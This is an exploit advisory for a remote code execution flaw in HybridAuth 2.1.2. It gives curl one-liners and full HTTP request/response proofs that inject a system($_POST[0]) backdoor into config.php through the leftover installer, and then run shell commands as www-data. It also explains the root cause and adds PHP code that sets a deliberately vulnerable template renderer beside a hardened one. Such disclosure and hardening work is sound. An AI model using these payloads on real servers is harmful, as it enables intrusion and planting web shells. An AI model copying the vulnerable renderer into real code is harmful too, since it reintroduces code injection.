######################################################################
# _ ___ _ _ ____ ____ _ _____
# | | / _ \| \ | |/ ___|/ ___| / \|_ _|
# | | | | | | \| | | _| | / _ \ | |
# | |__| |_| | |\ | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/ \_\_|
#
# HybridAuth <= 2.1.2 Remote Code Execution
# Website : http://hybridauth.sourceforge.net/
# Exploit Author : @u0x (Pichaya Morimoto)
# Release dates : August 5, 2014
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################
[+] Description
============================================================
HybridAuth enables developers to easily build social applications that engage
website visitors and customers on a social level by implementing social sign-in,
social sharing, user profiles, friends lists, activity streams, status updates and more.
[+] Exploit
============================================================
The default installation leaves "install.php" in place, so anyone who can reach the
web root can re-run the installer.
$ curl http://victim/hybridauth/install.php -d 'GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/*'
$ curl http://victim/hybridauth/config.php -d '0=id;ls -lha'
[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
Download : http://sourceforge.net/projects/hybridauth/files/hybridauth-2.1.2.zip/download
1. Inject Evil PHP Backdoor
POST /hybridauth/install.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 51

GLOBAL_HYBRID_AUTH_URL_BASE=".system($_POST[0]));/*
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 18:53:36 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 2437
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<title>HybridAuth Installer</title>
...
2. Gaining access to the PHP backdoor
POST /hybridauth/config.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

0=id;ls%20-lha
HTTP/1.1 200 OK
Date: Mon, 04 Aug 2014 18:54:56 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 403
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 40K
drwxrwxr-x 3 longcat   longcat   4.0K Feb 15  2013 .
drwxr-xr-x 4 longcat   www-data  4.0K Aug  5 01:14 ..
drwxrwxr-x 5 longcat   longcat   4.0K Feb 15  2013 Hybrid
-rw-rw-r-- 1 www-data  www-data  2.5K Aug  5 01:53 config.php
-rw-rw-r-- 1 longcat   longcat    488 Feb 15  2013 index.php
-rw-rw-r-- 1 longcat   longcat    18K Feb 16  2013 install.php
[+] Vulnerability Analysis
============================================================
Filename: ./install.php
...
if( count( $_POST ) ):                       <-- user controlled input: HTTP POST data
    \/-- Read a template file
    $CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.tpl" );
    foreach( $_POST AS $k => $v ):
        $v = strip_tags( $v );
        $z = "#$k#";
        \/-- #POST data's keys# found in the template file will be replaced
        |    with the POST data's values, so we can simply replace these
        |    existing values with something fun :)
        $CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE );
    endforeach;
...
    \/-- write the replaced template contents into config.php
    $is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE . "config.php", $CONFIG_TEMPLATE );
...
Filename: ./Hybrid/resources/config.php.tpl
...
return
    array(
        "base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#",   <-- #..# will be replaced with arbitrary PHP code
...
So this is what the injected "config.php" looks like...
Filename: ./config.php
<?php
...
return
    array(
        "base_url" => "".system($_POST[0]));/*",
        "providers" => array (
            // openid providers
            "OpenID" => array (
                "enabled" => #OPENID_ADAPTER_STATUS#
            ),
...
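The root cause above is that a user-supplied value is spliced into PHP source text with str_replace, and strip_tags() does nothing about quotes, parentheses or comment markers. As an added example (this is not HybridAuth's code), the snippet below reproduces that substitution pattern in simplified form and places a hardened version beside it: a whitelist of expected settings, per-setting validation, var_export() so every value lands in the file as a complete PHP literal, and a guard that refuses to run the installer once config.php exists. The template text, the ALLOWED_SETTINGS table, the function names and the example.com URL are constructed for this demo; it assumes PHP 7 or later.

```php
<?php
// Added example, not HybridAuth's code. Reproduces the install.php substitution
// pattern from the advisory in simplified form and puts a hardened version beside it.
// Template text, setting whitelist, function names and sample URL are constructed.

// Constructed template with the same shape as Hybrid/resources/config.php.tpl:
// the placeholder sits inside a double-quoted string literal.
const VULN_TEMPLATE = <<<'TPL'
<?php
return array(
    "base_url"   => "#GLOBAL_HYBRID_AUTH_URL_BASE#",
    "debug_mode" => #DEBUG_MODE#,
);
TPL;

// Vulnerable rendering: every POST key becomes a placeholder name and the value is
// pasted in verbatim. strip_tags() only removes <...> markup; quotes, parentheses
// and comment markers pass straight through, so a value can close the string
// literal and append PHP code.
function render_vulnerable(array $post): string
{
    $tpl = VULN_TEMPLATE;
    foreach ($post as $k => $v) {
        $v   = strip_tags($v);
        $tpl = str_replace("#$k#", $v, $tpl);
    }
    return $tpl;
}

// Hardened rendering. Placeholders are unquoted in the template because each value
// is emitted as a complete PHP literal by var_export(), which escapes ' and \.
// Only whitelisted settings are honoured and each one is validated for its type.
const ALLOWED_SETTINGS = [
    'GLOBAL_HYBRID_AUTH_URL_BASE' => 'url',
    'DEBUG_MODE'                  => 'bool',
];

const SAFE_TEMPLATE = <<<'TPL'
<?php
return array(
    "base_url"   => #GLOBAL_HYBRID_AUTH_URL_BASE#,
    "debug_mode" => #DEBUG_MODE#,
);
TPL;

function render_hardened(array $post): string
{
    $tpl = SAFE_TEMPLATE;
    foreach (ALLOWED_SETTINGS as $key => $type) {
        if (!array_key_exists($key, $post)) {
            throw new InvalidArgumentException("missing setting $key");
        }
        $raw = (string) $post[$key];
        if ($type === 'url') {
            if (filter_var($raw, FILTER_VALIDATE_URL) === false) {
                throw new InvalidArgumentException("$key is not a valid URL");
            }
            $literal = var_export($raw, true);   // single-quoted string with ' and \ escaped
        } else {
            $literal = var_export(filter_var($raw, FILTER_VALIDATE_BOOLEAN), true); // true / false
        }
        $tpl = str_replace("#$key#", $literal, $tpl);
    }
    // A leftover placeholder means template and whitelist disagree: refuse to write.
    if (preg_match('/#[A-Z_]+#/', $tpl)) {
        throw new RuntimeException('unfilled placeholder in generated config');
    }
    return $tpl;
}

// Installer guard: once config.php exists the installer must not run again.
function installer_allowed(string $configPath): bool
{
    return !file_exists($configPath);
}

// Demo input: the advisory's base_url payload plus a constructed debug flag.
$post = [
    'GLOBAL_HYBRID_AUTH_URL_BASE' => '".system($_POST[0]));/*',
    'DEBUG_MODE'                  => 'false',
];

echo "--- vulnerable rendering ---\n", render_vulnerable($post), "\n";

echo "--- hardened rendering ---\n";
try {
    echo render_hardened($post), "\n";
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// A well-formed URL passes validation and lands in the file as a quoted literal.
$post['GLOBAL_HYBRID_AUTH_URL_BASE'] = 'http://example.com/hybridauth/';
echo render_hardened($post), "\n";

// Guard usage (constructed path).
if (!installer_allowed(__DIR__ . '/config.php')) {
    echo "config.php already present; installer disabled\n";
}
```

Run it from the command line with `php` to compare the two renderings. In the vulnerable output the payload closes the "base_url" string and the rest of the line becomes executable code, exactly as in the injected config.php shown above; in the hardened path the same input is rejected by the URL check, and even a value that passed validation could not escape the literal because var_export() escapes the quote and backslash characters. The installer guard addresses the other half of the advisory: an installer that still answers requests after setup has finished.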
Happy Pwning ;)
LongCat
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information